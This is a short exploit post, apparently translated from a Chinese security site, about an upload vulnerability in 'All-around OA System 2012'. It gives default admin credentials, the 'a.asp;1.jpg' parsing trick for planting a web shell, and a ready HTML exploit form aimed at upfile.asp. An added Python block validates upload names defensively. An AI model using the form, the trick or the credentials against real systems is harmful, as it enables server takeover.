Software introduction:
All-around OA System 2012 is a powerful office automation (OA) system. Its feature set is now complete enough to meet day-to-day office requirements.
Main functions:
Company announcement
Work Plan
Communication Assistant
Customer resources
My Documents
Document Circulation
Public resources
Resource Reservation
Attendance today
Personal plan
Personal Address Book
Basic personal archive
Unread emails
Send email
Receiving folder
Sender folder
Network Hard Disk
Network Conference
Network Survey
Exchange Forum
Administrator username: admin; administrator password: admin
Source code download: http://www.mycodes.net/30/4750.htm
Vulnerable file:
upfile.asp, a typical online upload vulnerability
Exploitation:
Submit to: http://www.bkjia.com/upfile.asp
If upfile.asp does not exist, you can try the following method: upload a.asp;1.jpg
The shell is then at http://www.2cto.com/upfile/savepath/a.asp%1.jpg
Prerequisite: the server has a file-name parsing vulnerability
EXP:
<form method="POST" action="http://www.bkjia.com/oa/upfile.asp" enctype="multipart/form-data" id="form1" name="form1" onsubmit="return checkSub(this)">
<table border="0" align="center" cellpadding="5">
<tr>
<td>error: </td>
<td> <input type="radio" name="errnumber" value="0">
Automatic Rename
<input type="radio" name="errnumber" value="1" checked>
Error Reporting Method
<input type="radio" name="errnumber" value="2">
Direct coverage </td>
</tr>
<tr>
<td>topic: </td>
<td> <input type="text" name="filename" size="30"> </td>
</tr>
<tr>
<td>file: </td>
<td> <input type="file" name="fruit" size="30"> </td>
</tr>
<tr>
<td valign="top">Introduction: </td>
<td> <textarea name="fileext" cols="40" rows="5"> </textarea> </td>
</tr>
<tr>
<td colspan="2"> <input type="submit" value="Upload File" name="subbutt"> </td>
</tr>
</table>
</form>
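A defensive counterpart to the a.asp;1.jpg case above, as an added example that is not part of the original advisory or of the OA system's code: a server-side file-name check for an upload handler, plus an audit of an existing upload directory listing. The allow-list, the script-extension set, the function names and the sample listing are assumptions constructed for illustration.

```python
import re
import secrets

# Assumed allow-list for an office upload feature; adjust per deployment.
ALLOWED_EXTS = {"jpg", "png", "gif", "pdf", "doc", "xls"}
# Extensions a classic-ASP host executes; extend to match the host's handler mappings.
SCRIPT_EXTS = {"asp", "asa", "aspx"}
# One plain base name, one dot, one short extension. Nothing else is accepted.
PLAIN_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def check_name(name):
    """Return the reasons a client-supplied file name is rejected (empty list = accepted)."""
    reasons = []
    match = PLAIN_NAME.fullmatch(name)
    if match is None:
        reasons.append("not a plain <base>.<ext> name")
    elif match.group(1).lower() not in ALLOWED_EXTS:
        reasons.append("extension not allowed")
    # Split on every non-alphanumeric character so a script extension buried
    # in the middle of the name (as in 'a.asp;1.jpg') is still seen.
    tokens = re.split(r"[^A-Za-z0-9]+", name.lower())
    if SCRIPT_EXTS.intersection(tokens[1:]):
        reasons.append("script extension inside name")
    return reasons


def stored_name(client_name):
    """Validate the client name, then return a server-generated name to save under."""
    reasons = check_name(client_name)
    if reasons:
        raise ValueError("upload rejected: " + ", ".join(reasons))
    ext = client_name.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext


def audit(names):
    """Map each suspicious name in an existing upload directory listing to its reasons."""
    return {n: r for n in names if (r := check_name(n))}


# Constructed directory listing for illustration.
SAMPLE_LISTING = ["report.pdf", "a.asp;1.jpg", "logo.PNG", "notes.asp", "scan.jpg"]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_LISTING).items():
        print(f"{name}: {', '.join(reasons)}")
```

Name checks are one layer only; the upload directory should also have script execution disabled so that a stored file is never run by the server.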
www.2cto.com:
The online upload vulnerability is very old.
By Mr. DzY from www.0855.tv